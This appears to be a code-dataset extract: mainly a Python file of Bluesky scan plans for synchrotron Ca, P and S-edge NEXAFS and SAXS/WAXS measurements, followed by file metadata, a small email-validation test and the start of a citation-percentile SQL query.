        yield from bps.mv(piezo.y, y_pos)
    yield from bps.mv(energy, 4050)
    yield from bps.mv(energy, 4030)
def SAXS_Ca_edge_dry1(t=1):
    """Ca-edge measurement of the cell blank with both detectors.

    Closes the GV7 valve, then for each WAXS arc angle counts once per
    energy (stepping back down 4050 -> 4030 after each series); finishes
    by stepping the WAXS arc back while taking post-measurement frames at
    4030 eV, and resets the sample metadata.
    """
    dets = [pil300KW, pil1M]
    name = 'hyd_cell_blank2'
    energies = [4030, 4040, 4050, 4055, 4075]
    det_exposure_time(t,t)
    name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_wa{wa}'
    wa = [0.0, 6.5, 13.0]
    # Valve command issued twice with a pause — presumably to make sure it
    # actuates (TODO confirm).
    yield from bps.mv(GV7.close_cmd, 1 )
    yield from bps.sleep(1)
    yield from bps.mv(GV7.close_cmd, 1 )
    for wax in wa:
        yield from bps.mv(waxs, wax)
        for k, e in enumerate(energies):
            yield from bps.mv(energy, e)
            sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wax)
            sample_id(user_name='JDM', sample_name=sample_name)
            print(f'\n\t=== Sample: {sample_name} ===\n')
            yield from bp.count(dets, num=1)
        yield from bps.mv(energy, 4050)
        yield from bps.mv(energy, 4030)
    for wax in wa[::-1]:
        yield from bps.mv(waxs, wax)
        name_fmt = '{sample}_4030eV_postmeas_xbpm{xbpm}_wa{wa}'
        sample_name = name_fmt.format(sample=name, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wax)
        sample_id(user_name='OS', sample_name=sample_name)
        print(f'\n\t=== Sample: {sample_name} ===\n')
        yield from bp.count(dets, num=1)
    sample_id(user_name='test', sample_name='test')
def SAXS_Ca_edge_dry_special1(t=1):
    """Dry 'special' Ca-edge sequence for sample O5_chl_4.

    Closes the GV7 valve, builds a 3 x 5 grid of spots around the sample
    origin, runs the fine NEXAFS plan on every spot, then counts every
    WAXS-angle / energy / spot combination, and finishes with
    post-measurement frames at 4030 eV while stepping the WAXS arc back.
    """
    dets = [pil300KW]
    names = ['O5_chl_4']
    x_s = [-44500]
    y_s = [-1200]
    energies = [4030, 4040, 4050, 4055, 4075]
    det_exposure_time(t,t)
    name_fmt = '{sample}_{energy}eV_pos{posi}_wa{wa}_xbpm{xbpm}'
    wa = [0.0, 6.5, 13.0]
    yield from bps.mv(GV7.close_cmd, 1 )
    yield from bps.sleep(1)
    yield from bps.mv(GV7.close_cmd, 1 )
    for x, y, name in zip(x_s, y_s, names):
        yield from bps.mv(piezo.x, x)
        yield from bps.mv(piezo.y, y)
        # 5 y-points x 3 x-points = 15 spots around the sample origin.
        ys = np.linspace(y, y + 250, 5)
        xs = np.linspace(x, x - 400, 3)
        yss, xss = np.meshgrid(ys, xs)
        yss = yss.ravel()
        xss = xss.ravel()
        # NEXAFS on every spot first.
        for pos, (xsss, ysss) in enumerate(zip(xss, yss)):
            yield from bps.mv(piezo.x, xsss)
            yield from bps.mv(piezo.y, ysss)
            name_new = name + 'pos%2.2d'%pos
            yield from NEXAFS_Ca_edge_special(t=0.5, name=name_new)
        for wax in wa:
            yield from bps.mv(waxs, wax)
            for k, e in enumerate(energies):
                yield from bps.mv(energy, e)
                for pos, (xsss, ysss) in enumerate(zip(xss, yss)):
                    yield from bps.mv(piezo.x, xsss)
                    yield from bps.mv(piezo.y, ysss)
                    sample_name = name_fmt.format(sample=name, energy=e, posi='%2.2d'%pos ,wa='%2.1f'%wax, xbpm = '%3.1f'%xbpm3.sumY.value)
                    sample_id(user_name='JDM', sample_name=sample_name)
                    print(f'\n\t=== Sample: {sample_name} ===\n')
                    yield from bp.count(dets, num=1)
            yield from bps.mv(energy, 4050)
            yield from bps.mv(energy, 4030)
        # Post-measurement frames at 4030 eV, stepping the arc back down.
        for wax in wa[::-1]:
            yield from bps.mv(waxs, wax)
            for pos, (xsss, ysss) in enumerate(zip(xss, yss)):
                yield from bps.mv(piezo.x, xsss)
                yield from bps.mv(piezo.y, ysss)
                name_fmt = '{sample}_postmeas_4030eV_pos{posi}_wa{wa}_xbpm{xbpm}'
                sample_name = name_fmt.format(sample=name, posi='%2.2d'%pos, wa='%2.1f'%wax, xbpm = '%3.1f'%xbpm3.sumY.value)
                sample_id(user_name='JDM', sample_name=sample_name)
                print(f'\n\t=== Sample: {sample_name} ===\n')
                yield from bp.count(dets, num=1)
    sample_id(user_name='test', sample_name='test')
def SAXS_Ca_edge_dry_special2(t=1):
    """Dry 'special' Ca-edge sequence over nine samples.

    Opens the GV7 valve (unlike special1, which closes it), then per
    sample: builds a 2 x 2 spot grid, runs the fine NEXAFS plan once at
    the origin, counts every WAXS-angle / energy / spot combination, and
    takes post-measurement frames at 4030 eV on each spot while stepping
    the WAXS arc back.
    """
    dets = [pil300KW, pil1M]
    names = ['O5_ut_2','O5_ut_3','O5_ut_4', 'O5_ca_1', 'O5_ca_2', 'O5_ca_3', 'O5_chl_1', 'O5_chl_2', 'O5_chl_3']
    x_s = [31500, 25000, 18000, 5400, 100, -5400, -22600, -30600, -38600]
    y_s = [-2200, -1400, -2000, -2000, -2000, -2000, -800, -2000, -2000]
    energies = [4030, 4040, 4050, 4055, 4075]
    det_exposure_time(t,t)
    name_fmt = '{sample}_{energy}eV_pos{posi}_wa{wa}_xbpm{xbpm}'
    wa = [0.0, 6.5, 13.0]
    yield from bps.mv(GV7.open_cmd, 1 )
    yield from bps.sleep(1)
    yield from bps.mv(GV7.open_cmd, 1 )
    for x, y, name in zip(x_s, y_s, names):
        yield from bps.mv(piezo.x, x)
        yield from bps.mv(piezo.y, y)
        # 2 x 2 spot grid around the sample origin.
        ys = np.linspace(y, y + 500, 2)
        xs = np.linspace(x, x - 500, 2)
        yss, xss = np.meshgrid(ys, xs)
        yss = yss.ravel()
        xss = xss.ravel()
        yield from NEXAFS_Ca_edge_special(t=0.5, name=name)
        for wax in wa:
            yield from bps.mv(waxs, wax)
            for k, e in enumerate(energies):
                yield from bps.mv(energy, e)
                for pos, (xsss, ysss) in enumerate(zip(xss, yss)):
                    yield from bps.mv(piezo.x, xsss)
                    yield from bps.mv(piezo.y, ysss)
                    sample_name = name_fmt.format(sample=name, energy=e, posi='%1.1d'%pos ,wa='%2.1f'%wax, xbpm = '%3.1f'%xbpm3.sumY.value)
                    sample_id(user_name='JDM', sample_name=sample_name)
                    print(f'\n\t=== Sample: {sample_name} ===\n')
                    yield from bp.count(dets, num=1)
            yield from bps.mv(energy, 4050)
            yield from bps.mv(energy, 4030)
        wa = [0.0, 6.5, 13.0]  # NOTE(review): redundant — wa is not modified above
        for wax in wa[::-1]:
            yield from bps.mv(waxs, wax)
            for pos, (xsss, ysss) in enumerate(zip(xss, yss)):
                yield from bps.mv(piezo.x, xsss)
                yield from bps.mv(piezo.y, ysss)
                name_fmt = '{sample}_postmeas_4030eV_pos{posi}_wa{wa}_xbpm{xbpm}'
                sample_name = name_fmt.format(sample=name, posi='%2.2d'%pos, wa='%2.1f'%wax, xbpm = '%3.1f'%xbpm3.sumY.value)
                sample_id(user_name='JDM', sample_name=sample_name)
                print(f'\n\t=== Sample: {sample_name} ===\n')
                yield from bp.count(dets, num=1)
    sample_id(user_name='test', sample_name='test')
def NEXAFS_Ca_edge_special(t=0.5, name='test'):
    """Fine Ca-edge NEXAFS used by the 'special' SAXS sequences.

    Parks the WAXS arc at 60, scans 4030-4100 eV in 1 eV steps with one
    pil300KW count per point, then walks the energy back down in stages
    with settling pauses and resets the sample metadata.
    """
    yield from bps.mv(waxs, 60)
    dets = [pil300KW]
    energies = np.linspace(4030, 4100, 71)
    det_exposure_time(t,t)
    name_fmt = 'nexafs_{sample}_{energy}eV_xbpm{xbpm}'
    for e in energies:
        yield from bps.mv(energy, e)
        sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
        sample_id(user_name='JDM', sample_name=sample_name)
        print(f'\n\t=== Sample: {sample_name} ===\n')
        yield from bp.count(dets, num=1)
    yield from bps.mv(energy, 4075)
    yield from bps.sleep(2)
    yield from bps.mv(energy, 4050)
    yield from bps.sleep(2)
    yield from bps.mv(energy, 4030)
    sample_id(user_name='test', sample_name='test')
def night_shift_run(t=1):
    """Overnight sequence: run both dry 'special' Ca-edge plans in turn.

    NOTE(review): the t parameter is ignored — both sub-plans are invoked
    with a hard-coded t=0.5.
    """
    yield from SAXS_Ca_edge_dry_special1(t=0.5)
    yield from bps.sleep(10)
    yield from SAXS_Ca_edge_dry_special2(t=0.5)
def run_saxs_nexafs(t=1):
    """Run the NEXAFS multisample prep followed by the SAXS multisample prep.

    NOTE(review): the t parameter is ignored — both sub-plans are invoked
    with a hard-coded t=0.5.
    """
    yield from nexafs_prep_multisample(t=0.5)
    yield from bps.sleep(10)
    yield from saxs_prep_multisample(t=0.5)
def nexafs_prep_multisample(t=1):
    """Run the multi-point Ca-edge NEXAFS plan at each listed sample spot.

    NOTE(review): t is ignored — NEXAFS_Ca_edge_multi is always called
    with t=0.5.
    """
    names = ['NEXAFS_WT_CH24_1_spot3','NEXAFS_WT_CH24_2_spot3','NEXAFS_WT_CH24_3_spot3', 'NEXAFS_xxt1xxt2_CH24_Ca_1_spot1']
    x_s = [27400, 20800, 14700, -13250]
    y_s = [300, 300, 200, -1300]
    for x, y, name in zip(x_s, y_s, names):
        yield from bps.mv(piezo.x, x)
        yield from bps.mv(piezo.y, y)
        yield from NEXAFS_Ca_edge_multi(t=0.5, name=name)
    sample_id(user_name='test', sample_name='test')
def saxs_prep_multisample(t=1):
    """Ca-edge SAXS/WAXS over a list of CH24 sample spots.

    For each sample spot and each WAXS arc angle, counts once per energy
    (then steps the energy back down 4050 -> 4030), and finishes each
    sample with post-measurement frames at 4030 eV while stepping the
    arc back.
    """
    dets = [pil300KW, pil1M]
    names = ['xxt1xxt2_CH24_Ca_1_spot1', 'xxt1xxt2_CH24_Ca_1_spot2', 'xxt1xxt2_CH24_Ca_1_spot3', 'xxt1xxt2_CH24_Ca_3_spot3', 'xxt1xxt2_CH24_Ca_3_spot2', 'xxt1xxt2_CH24_Ca_3_spot1']
    x_s = [-13250, -13250, -13250, -27550, -27250, -27490]
    y_s = [-1400, -800, 100, 300, -800, -1600]
    energies = [4030, 4040, 4050, 4055, 4075]
    det_exposure_time(t,t)
    name_fmt = '{sample}_{energy}eV_pos{posi}_wa{wa}_xbpm{xbpm}'  # NOTE(review): dead assignment — overwritten inside the loops below
    wa = [0, 6.5, 13.0] #19.5
    for x, y, name in zip(x_s, y_s, names):
        yield from bps.mv(piezo.x, x)
        yield from bps.mv(piezo.y, y)
        for wax in wa:
            yield from bps.mv(waxs, wax)
            for k, e in enumerate(energies):
                yield from bps.mv(energy, e)
                name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_wa{wa}'
                sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wax)
                sample_id(user_name='OS', sample_name=sample_name)
                print(f'\n\t=== Sample: {sample_name} ===\n')
                yield from bp.count(dets, num=1)
            yield from bps.mv(energy, 4050)
            yield from bps.mv(energy, 4030)
        for wax in wa[::-1]:
            yield from bps.mv(waxs, wax)
            name_fmt = '{sample}_4030eV_postmeas_xbpm{xbpm}_wa{wa}'
            sample_name = name_fmt.format(sample=name, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wax)
            sample_id(user_name='OS', sample_name=sample_name)
            print(f'\n\t=== Sample: {sample_name} ===\n')
            yield from bp.count(dets, num=1)
    sample_id(user_name='test', sample_name='test')
def NEXAFS_Ca_edge_multi(t=0.5, name='test'):
    """Ca-edge NEXAFS helper used by the multisample prep plans.

    Parks the WAXS arc at 60, scans 4030-4150 eV in 1 eV steps with one
    pil300KW count per point, then walks the energy back down through
    intermediate points and resets the sample metadata.
    """
    yield from bps.mv(waxs, 60)
    dets = [pil300KW]
    energies = np.linspace(4030, 4150, 121)
    det_exposure_time(t,t)
    name_fmt = '{sample}_{energy}eV_xbpm{xbpm}'
    for e in energies:
        yield from bps.mv(energy, e)
        sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
        sample_id(user_name='OS', sample_name=sample_name)
        print(f'\n\t=== Sample: {sample_name} ===\n')
        yield from bp.count(dets, num=1)
    # Step back down in stages rather than one large move.
    yield from bps.mv(energy, 4125)
    yield from bps.mv(energy, 4100)
    yield from bps.mv(energy, 4075)
    yield from bps.mv(energy, 4050)
    yield from bps.mv(energy, 4030)
    sample_id(user_name='test', sample_name='test')
def NEXAFS_Ca_edge(t=0.5,):
    """Ca-edge NEXAFS of the hydrated-cell blank.

    Parks the WAXS arc at 60, scans 4030-4150 eV in 1 eV steps, walks the
    energy back down in stages, takes one post-measurement frame at
    4030 eV, and resets the sample metadata.
    """
    yield from bps.mv(waxs, 60)
    dets = [pil300KW]
    name = 'hyd_cell_blank_sp2'
    #x = [8800]
    energies = np.linspace(4030, 4150, 121)
    #for name, x in zip(names, x):
    #bps.mv(piezo.x, x)
    det_exposure_time(t,t)
    name_fmt = '{sample}_{energy}eV_xbpm{xbpm}'
    for e in energies:
        yield from bps.mv(energy, e)
        sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
        sample_id(user_name='JDM', sample_name=sample_name)
        print(f'\n\t=== Sample: {sample_name} ===\n')
        yield from bp.count(dets, num=1)
    # Step back down in stages rather than one large move.
    yield from bps.mv(energy, 4125)
    yield from bps.mv(energy, 4100)
    yield from bps.mv(energy, 4075)
    yield from bps.mv(energy, 4050)
    yield from bps.mv(energy, 4030)
    name_fmt = '{sample}_4030.0eV_postmeas'
    sample_name = name_fmt.format(sample=name)
    sample_id(user_name='OS', sample_name=sample_name)
    print(f'\n\t=== Sample: {sample_name} ===\n')
    yield from bp.count(dets, num=1)
    sample_id(user_name='test', sample_name='test')
def NEXAFS_P_edge(t=0.5):
    """NEXAFS scan at the P edge: 2140-2180 eV in 1 eV steps.

    One pil300KW count per energy; afterwards the energy is walked back
    down through the same points (energies_back) instead of one jump.
    """
    yield from bps.mv(waxs, 30)
    dets = [pil300KW]
    name = 'NEXAFS_PBS1_Pedge_nspot1'
    energies = np.linspace(2140, 2180, 41)
    energies_back = np.linspace(2180, 2140, 41)
    det_exposure_time(t,t)
    name_fmt = '{sample}_{energy}eV_xbpm{xbpm}'
    for e in energies:
        yield from bps.mv(energy, e)
        sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
        sample_id(user_name='SR', sample_name=sample_name)
        print(f'\n\t=== Sample: {sample_name} ===\n')
        yield from bp.count(dets, num=1)
    for e in energies_back:
        yield from bps.mv(energy, e)
    yield from bps.sleep(2)
def NEXAFS_S_edge(t=0.5):
    """NEXAFS scan at the S edge: 2430-2500 eV in 1 eV steps.

    One pil300KW count per energy, then a coarser 36-point walk back down
    to 2430 eV with no counting.
    """
    yield from bps.mv(waxs, 30)
    dets = [pil300KW]
    name = 'NEXAFS_A12_Sedge'
    energies = np.linspace(2430, 2500, 71)
    energies_back = np.linspace(2500, 2430, 36)
    det_exposure_time(t,t)
    name_fmt = '{sample}_{energy}eV_xbpm{xbpm}'
    for e in energies:
        yield from bps.mv(energy, e)
        sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
        sample_id(user_name='SR', sample_name=sample_name)
        print(f'\n\t=== Sample: {sample_name} ===\n')
        yield from bp.count(dets, num=1)
    for e in energies_back:
        yield from bps.mv(energy, e)
# NOTE(review): waxs_S_edge is defined twice in this file; the later
# definition shadows this one at import time, so this version is dead
# code unless the duplicate is renamed or removed.
def waxs_S_edge(t=1):
    """S-edge WAXS: for each sample, step 2456-2500 eV in 2 eV steps and
    scan the WAXS arc at every energy, then walk the energy back down and
    take a post-measurement arc scan at 2456 eV."""
    dets = [pil300KW]
    names = ['A41']
    x = [-28200]
    y = [1600]
    # NOTE(review): names1/x1/y1 and Ys are unused in this version.
    names1 = ['P3HT']
    x1 = [-38700]
    y1 = [900]
    energies = np.linspace(2456, 2500, 23)
    Ys = np.linspace(900, 2200, 23)
    waxs_arc = [0, 19.5, 4]  # bp.scan args: start, stop, num points
    for name, xs, ys in zip(names, x, y):
        yield from bps.mv(piezo.x, xs)
        yield from bps.mv(piezo.y, ys)
        det_exposure_time(t,t)
        name_fmt = '{sample}_{energy}eV'
        for e in energies:
            yield from bps.mv(energy, e)
            sample_name = name_fmt.format(sample=name, energy=e)
            sample_id(user_name='SR', sample_name=sample_name)
            print(f'\n\t=== Sample: {sample_name} ===\n')
            yield from bp.scan(dets, waxs, *waxs_arc)
        # Step the energy back down in stages before the post-measurement scan.
        yield from bps.mv(energy, 2490)
        yield from bps.mv(energy, 2480)
        yield from bps.mv(energy, 2470)
        yield from bps.mv(energy, 2460)
        yield from bps.mv(energy, 2456)
        name_fmt = '{sample}_2456eV_postmeas'
        sample_name = name_fmt.format(sample=name)
        sample_id(user_name='SR', sample_name=sample_name)
        print(f'\n\t=== Sample: {sample_name} ===\n')
        yield from bp.scan(dets, waxs, *waxs_arc)
# NOTE(review): duplicate definition — this shadows the earlier
# waxs_S_edge above. Rename one of them if both are still needed.
def waxs_S_edge(t=1):
    """S-edge WAXS for the P3HT sample.

    At each energy in the hand-picked list, moves to a fresh y position
    (zip with Ys) and scans the WAXS arc; finishes with a post-measurement
    arc scan back at 2460 eV.
    """
    dets = [pil300KW]
    names1 = ['P3HT']
    x1 = [-38700]
    y1 = [900]
    energies = [2460, 2465, 2470, 2474, 2475, 2476, 2478, 2480]
    Ys = np.linspace(900, 2200, 8)  # one fresh y spot per energy
    waxs_arc = [0, 39, 7]  # bp.scan args: start, stop, num points
    for name, xs, ys in zip(names1, x1, y1):
        yield from bps.mv(piezo.x, xs)
        yield from bps.mv(piezo.y, ys)
        det_exposure_time(t,t)
        name_fmt = '{sample}_{energy}eV'
        for e, ys in zip(energies, Ys):
            yield from bps.mv(energy, e)
            yield from bps.mv(piezo.y, ys)
            sample_name = name_fmt.format(sample=name, energy=e)
            sample_id(user_name='GF', sample_name=sample_name)
            print(f'\n\t=== Sample: {sample_name} ===\n')
            yield from bp.scan(dets, waxs, *waxs_arc)
        yield from bps.mv(energy, 2470)
        yield from bps.mv(energy, 2460)
        name_fmt = '{sample}_2460eV_postmeas'
        sample_name = name_fmt.format(sample=name)
        sample_id(user_name='SR', sample_name=sample_name)
        print(f'\n\t=== Sample: {sample_name} ===\n')
        yield from bp.scan(dets, waxs, *waxs_arc)
def gomez_S_edge_new(t=1):
    """Gomez S-edge WAXS series over two rows of samples.

    Energy list: 2445-2470 (5 eV), 2470-2480 (0.25 eV), 2480-2490 (1 eV),
    2490-2500 (5 eV) -- 58 points in total. Each sample gets a
    2 x 29 = 58-point (x, y) grid so every energy lands on a fresh spot
    (presumably to limit beam damage -- TODO confirm). The second half
    repeats the scheme on a second row after tilting the stage.
    """
    dets = [pil300KW]
    energies = np.arange(2445, 2470, 5).tolist() + np.arange(2470, 2480, 0.25).tolist() + np.arange(2480, 2490, 1).tolist()+ np.arange(2490, 2501, 5).tolist()
    waxs_arc = np.linspace(0, 19.5, 4)
    yield from bps.mv(stage.th, 0)
    yield from bps.mv(stage.y, 0)
    names = ['P-1','P-2','Y-1','Y-2','Y-3','A5-1','A05-2','A0-1','A0-2','A2-1','A2-2','A05-1','A5-2','5','2-1','2-2','05']
    x = [43400,38100,32300,26850,21700,16200,11000, 5600, 400, -4900,-10300,-15600,-21100,-26300,-31400,-36500,-42100]
    y = [-3850,-3950,-3800,-400, -4100,-4150,-4150,-4150,-4100,-4100, -4050, -4200, -3750, -3800, -3700, -3650, -3800]
    for name, xs, ys in zip(names, x, y):
        yield from bps.mv(piezo.x, xs)
        yield from bps.mv(piezo.y, ys)
        # 29 y-points x 2 x-columns = 58 spots, matching len(energies).
        yss = np.linspace(ys, ys + 700, 29)
        xss = np.array([xs, xs + 300])
        yss, xss = np.meshgrid(yss, xss)
        yss = yss.ravel()
        xss = xss.ravel()
        for wa in waxs_arc:
            yield from bps.mv(waxs, wa)
            det_exposure_time(t,t)
            name_fmt = '{sample}_{energy}eV_wa{wax}_bpm{xbpm}'
            for e, xsss, ysss in zip(energies, xss, yss):
                yield from bps.mv(energy, e)
                yield from bps.sleep(1)
                yield from bps.mv(piezo.y, ysss)
                yield from bps.mv(piezo.x, xsss)
                bpm = xbpm2.sumX.value  # beam-position-monitor reading recorded in the name
                sample_name = name_fmt.format(sample=name, energy='%6.2f'%e, wax = wa, xbpm = '%4.3f'%bpm)
                sample_id(user_name='GF', sample_name=sample_name)
                print(f'\n\t=== Sample: {sample_name} ===\n')
                yield from bp.count(dets, num=1)
            yield from bps.mv(energy, 2470)
            yield from bps.mv(energy, 2450)
    # Second row: tilt the stage and repeat the same scheme.
    yield from bps.mv(stage.th, 1)
    yield from bps.mv(stage.y, -8)
    names = ['10','CN','CN-2','CB','CB-2','DIO','AA-1','AA-2','AA-3']
    x = [44300,39200,33800,28500,23200,18100,11700, 6300, 900]
    y = [-8700,-8700,-8550,-8400,-8400,-7800,-8600,-8500,-8400]
    for name, xs, ys in zip(names, x, y):
        yield from bps.mv(piezo.x, xs)
        yield from bps.mv(piezo.y, ys)
        yss = np.linspace(ys, ys + 700, 29)
        xss = np.array([xs, xs + 300])
        yss, xss = np.meshgrid(yss, xss)
        yss = yss.ravel()
        xss = xss.ravel()
        for wa in waxs_arc:
            yield from bps.mv(waxs, wa)
            det_exposure_time(t,t)
            name_fmt = '{sample}_{energy}eV_wa{wax}_bpm{xbpm}'
            for e, xsss, ysss in zip(energies, xss, yss):
                yield from bps.mv(energy, e)
                yield from bps.sleep(1)
                yield from bps.mv(piezo.y, ysss)
                yield from bps.mv(piezo.x, xsss)
                bpm = xbpm2.sumX.value
                sample_name = name_fmt.format(sample=name, energy='%6.2f'%e, wax = wa, xbpm = '%4.3f'%bpm)
                sample_id(user_name='GF', sample_name=sample_name)
                print(f'\n\t=== Sample: {sample_name} ===\n')
                yield from bp.count(dets, num=1)
            yield from bps.mv(energy, 2470)
            yield from bps.mv(energy, 2450)
def nexafs_gomez_S_edge_new(t=1):
    """Fixed-spot NEXAFS companion to gomez_S_edge_new.

    Uses the same composite energy list, parks the WAXS arc at 52.5, and
    takes one count per energy at a single spot per sample, for two rows
    of samples (stage tilted between them). Energy steps back down
    2470 -> 2450 after each series.
    """
    dets = [pil300KW]
    energies = np.arange(2445, 2470, 5).tolist() + np.arange(2470, 2480, 0.25).tolist() + np.arange(2480, 2490, 1).tolist()+ np.arange(2490, 2501, 5).tolist()
    waxs_arc = [52.5]
    yield from bps.mv(stage.th, 0)
    yield from bps.mv(stage.y, 0)
    names = ['A05-1','A5-2','5','2-1','2-2','05']
    x = [-15600,-21100,-26300,-31400,-36500,-42100]
    y = [ -4200, -3750, -3800, -3700, -3650, -3800]
    for name, xs, ys in zip(names, x, y):
        yield from bps.mv(piezo.x, xs)
        yield from bps.mv(piezo.y, ys)
        for wa in waxs_arc:
            yield from bps.mv(waxs, wa)
            det_exposure_time(t,t)
            name_fmt = 'nexafs_{sample}_{energy}eV_wa{wax}_bpm{xbpm}'
            for e in energies:
                yield from bps.mv(energy, e)
                yield from bps.sleep(1)
                bpm = xbpm2.sumX.value  # beam-position-monitor reading recorded in the name
                sample_name = name_fmt.format(sample=name, energy='%6.2f'%e, wax = wa, xbpm = '%4.3f'%bpm)
                sample_id(user_name='GF', sample_name=sample_name)
                print(f'\n\t=== Sample: {sample_name} ===\n')
                yield from bp.count(dets, num=1)
            yield from bps.mv(energy, 2470)
            yield from bps.mv(energy, 2450)
    # Second row: tilt the stage and repeat.
    yield from bps.mv(stage.th, 1)
    yield from bps.mv(stage.y, -8)
    names = ['10','CN','CN-2','CB','CB-2','DIO','AA-1','AA-2','AA-3']
    x = [44300,39200,33800,28500,23200,18100,11700, 6300, 900]
    y = [-8700,-8700,-8550,-8400,-8400,-7800,-8600,-8500,-8400]
    for name, xs, ys in zip(names, x, y):
        yield from bps.mv(piezo.x, xs)
        yield from bps.mv(piezo.y, ys)
        for wa in waxs_arc:
            yield from bps.mv(waxs, wa)
            det_exposure_time(t,t)
            name_fmt = 'nexafs_{sample}_{energy}eV_wa{wax}_bpm{xbpm}'
            for e in energies:
                yield from bps.mv(energy, e)
                yield from bps.sleep(1)
                bpm = xbpm2.sumX.value
                sample_name = name_fmt.format(sample=name, energy='%6.2f'%e, wax = wa, xbpm = '%4.3f'%bpm)
                sample_id(user_name='GF', sample_name=sample_name)
                print(f'\n\t=== Sample: {sample_name} ===\n')
                yield from bp.count(dets, num=1)
            yield from bps.mv(energy, 2470)
            yield from bps.mv(energy, 2450)
def trans_sulf(en1, en2, step):
    """Sweep the beamline energy from en1 to en2 over `step` points,
    pausing 10 s after each move (no detector readout is triggered)."""
    for target in np.linspace(en1, en2, step):
        yield from bps.mv(energy, target)
        yield from bps.sleep(10)
| 36.830275
| 180
| 0.548138
| 4,802
| 32,116
| 3.498959
| 0.09621
| 0.114629
| 0.124271
| 0.130818
| 0.833532
| 0.801274
| 0.782823
| 0.771694
| 0.76104
| 0.748304
| 0
| 0.123634
| 0.301874
| 32,116
| 871
| 181
| 36.87256
| 0.625753
| 0.05723
| 0
| 0.765599
| 0
| 0.001686
| 0.122404
| 0.051349
| 0
| 0
| 0
| 0
| 0.003373
| 1
| 0.040472
| false
| 0
| 0
| 0
| 0.040472
| 0.048904
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41e7c7269fea1a866d303c501049e80b34c0c9e7
| 40
|
py
|
Python
|
src/finance_stats/equity_curve/__init__.py
|
pralphv/hkportfolioanalysis-backend
|
6dbf6f17e6ebd95e28ee042126b34408dde4f520
|
[
"MIT"
] | null | null | null |
src/finance_stats/equity_curve/__init__.py
|
pralphv/hkportfolioanalysis-backend
|
6dbf6f17e6ebd95e28ee042126b34408dde4f520
|
[
"MIT"
] | 1
|
2021-03-31T19:44:25.000Z
|
2021-03-31T19:44:25.000Z
|
src/finance_stats/equity_curve/__init__.py
|
pralphv/hkportfolioanalysis-backend
|
6dbf6f17e6ebd95e28ee042126b34408dde4f520
|
[
"MIT"
] | 1
|
2020-11-27T17:56:38.000Z
|
2020-11-27T17:56:38.000Z
|
from .api import generate_equity_curves
| 20
| 39
| 0.875
| 6
| 40
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 1
| 40
| 40
| 0.916667
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
510ed061f0427e3992d0e0ee82aaab9c8dc2fab5
| 183
|
py
|
Python
|
test_illegal.py
|
gregdetre/unit-testing-pres
|
c28cd3a938436b18f2175bfb43d0c33820dfc7ee
|
[
"MIT"
] | null | null | null |
test_illegal.py
|
gregdetre/unit-testing-pres
|
c28cd3a938436b18f2175bfb43d0c33820dfc7ee
|
[
"MIT"
] | null | null | null |
test_illegal.py
|
gregdetre/unit-testing-pres
|
c28cd3a938436b18f2175bfb43d0c33820dfc7ee
|
[
"MIT"
] | null | null | null |
from isitanemail import isitanemail
# USAGE:
# $ nose2 test_illegal
# $ nose2 test_illegal.test_illegal_no_tld
def test_illegal_no_tld():
    """An address whose domain lacks a top-level domain must be rejected."""
    verdict = isitanemail('ab@cd')
    assert not verdict
| 15.25
| 42
| 0.743169
| 25
| 183
| 5.12
| 0.56
| 0.34375
| 0.25
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013245
| 0.174863
| 183
| 11
| 43
| 16.636364
| 0.834437
| 0.371585
| 0
| 0
| 0
| 0
| 0.045455
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
515e007899096be25e51248dd4ca92486a14e13b
| 2,920
|
py
|
Python
|
tests/test_ntiles.py
|
georgetown-cset/ai-definitions-for-policymaking
|
667e928c8bb30f6e02696ac71081c6bae4096f50
|
[
"ADSL"
] | 1
|
2020-06-24T20:45:03.000Z
|
2020-06-24T20:45:03.000Z
|
tests/test_ntiles.py
|
georgetown-cset/ai-definitions-for-policymaking
|
667e928c8bb30f6e02696ac71081c6bae4096f50
|
[
"ADSL"
] | null | null | null |
tests/test_ntiles.py
|
georgetown-cset/ai-definitions-for-policymaking
|
667e928c8bb30f6e02696ac71081c6bae4096f50
|
[
"ADSL"
] | null | null | null |
from settings import DATASET
# Per-year citation n-tile summary over the whole comparison table,
# keyed on the precomputed citation_percentile column.
ntile_sql = f"""\
select
year,
citation_percentile,
min(times_cited) min_times_cited,
